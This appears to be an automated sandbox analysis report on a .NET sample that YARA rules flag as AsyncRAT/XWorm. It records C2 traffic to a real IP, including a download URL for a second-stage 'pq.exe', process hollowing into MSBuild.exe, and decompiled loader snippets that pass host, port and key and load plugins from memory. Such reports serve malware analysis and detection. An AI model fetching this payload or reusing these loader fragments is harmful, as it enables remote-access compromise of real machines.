            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 72.247.153.162
            Source: unknownTCP traffic detected without corresponding DNS query: 72.247.153.162
            Source: unknownTCP traffic detected without corresponding DNS query: 72.247.153.162
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
            Source: unknownTCP traffic detected without corresponding DNS query: 72.247.153.162
            Source: unknownTCP traffic detected without corresponding DNS query: 72.247.153.162
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: global trafficHTTP traffic detected: GET /pq.exe HTTP/1.1Host: 92.255.85.2Connection: Keep-Alive
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2/pq.exe
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.2/pq.exeP
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00B763501_2_00B76350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00B784B81_2_00B784B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00B756781_2_00B75678
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00B7AC101_2_00B7AC10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00B753301_2_00B75330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00B70BA01_2_00B70BA0
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe, 00000000.00000000.1353424703.0000000000872000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBolerXls.exe2 vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364221402.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exeBinary or memory string: OriginalFilenameBolerXls.exe2 vs v4mNsTzbsL.exe
            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: v4mNsTzbsL.exe, Config.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcTVNCdWlsZC5leGU='
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/1@0/1
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\v4mNsTzbsL.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\bFh8cGGVyBJ2hXxI
            Source: v4mNsTzbsL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: v4mNsTzbsL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: v4mNsTzbsL.exeVirustotal: Detection: 50%
            Source: v4mNsTzbsL.exeReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Users\user\Desktop\v4mNsTzbsL.exe "C:\Users\user\Desktop\v4mNsTzbsL.exe"
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: v4mNsTzbsL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: v4mNsTzbsL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: v4mNsTzbsL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: v4mNsTzbsL.exeStatic PE information: 0xC61F1F27 [Wed May 1 09:25:59 2075 UTC]
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
